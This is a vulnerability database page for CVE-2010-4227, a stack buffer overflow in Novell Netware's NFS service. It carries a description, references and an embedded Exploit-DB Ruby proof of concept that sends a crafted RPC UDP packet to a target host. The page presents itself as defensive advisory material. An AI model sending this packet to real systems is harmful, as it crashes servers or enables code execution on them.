CVE-2010-4227
Description
The xdrDecodeString function in XNFS.NLM in Novell Netware 6.5 before SP8 allows remote attackers to cause a denial of service (abend) or execute arbitrary code via a crafted, signed value in a NFS RPC request to port UDP 1234, leading to a stack-based buffer overflow.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Novell Netware - RPC XNFS xdrDecodeString
#!/usr/bin/ruby
# Source:
# http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=24&Itemid=24
require 'socket'
netware_server = (ARGV[0])
target_port = (ARGV[1] || 1234)
beepbeep=
"\x1c\xd1\xef\xab" + # XID
"\x00\x00\x00\x00" + # Message Type: Call (0)
"\x00\x00\x00\x02" + # RPC Version: 2
"\x00\x01\x86\xa5" + # Program: 10005 MOUNT
"\x00\x00\x00\x02" + # Program Version: 2
"\x00\x00\x00\x01" + # Procedure: MNT (1)
"\x00\x00\x00\x00\x00\x00\x00\x00" + #
"\x00\x00\x00\x00\x00\x00\x00\x00" + #Verifier NULL
"\x41\x42\x43\x44"
puts "[+] beep beep\n"
puts "[+]No, it's not the road runner\n"
if (!(netware_server && target_port))
puts "Usage: PRL-2011-04.rb host port (default port: 1234)\n"
exit
else
puts "[+]Sending UDP Packet...\n"
sock = UDPSocket.open
sock.connect(netware_server, target_port.to_i)
sock.send(beepbeep, 0)
endReferences
- http://download.novell.com/Download?buildid=1z3z-OsVCiE~
- http://secunia.com/advisories/43431
- http://securityreason.com/securityalert/8104
- http://www.exploit-db.com/exploits/16234
- http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=24&Itemid=24
- http://www.securityfocus.com/archive/1/516645/100/0/threaded
- http://www.securityfocus.com/bid/46535
- http://www.securitytracker.com/id?1025119
- http://www.vupen.com/english/advisories/2011/0497
- http://www.zerodayinitiative.com/advisories/ZDI-11-090
- https://exchange.xforce.ibmcloud.com/vulnerabilities/65625
- http://download.novell.com/Download?buildid=1z3z-OsVCiE~
- http://secunia.com/advisories/43431
- http://securityreason.com/securityalert/8104
- http://www.exploit-db.com/exploits/16234
- http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=24&Itemid=24
- http://www.securityfocus.com/archive/1/516645/100/0/threaded
- http://www.securityfocus.com/bid/46535
- http://www.securitytracker.com/id?1025119
- http://www.vupen.com/english/advisories/2011/0497
- http://www.zerodayinitiative.com/advisories/ZDI-11-090
- https://exchange.xforce.ibmcloud.com/vulnerabilities/65625
CWEs
CWE-119
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.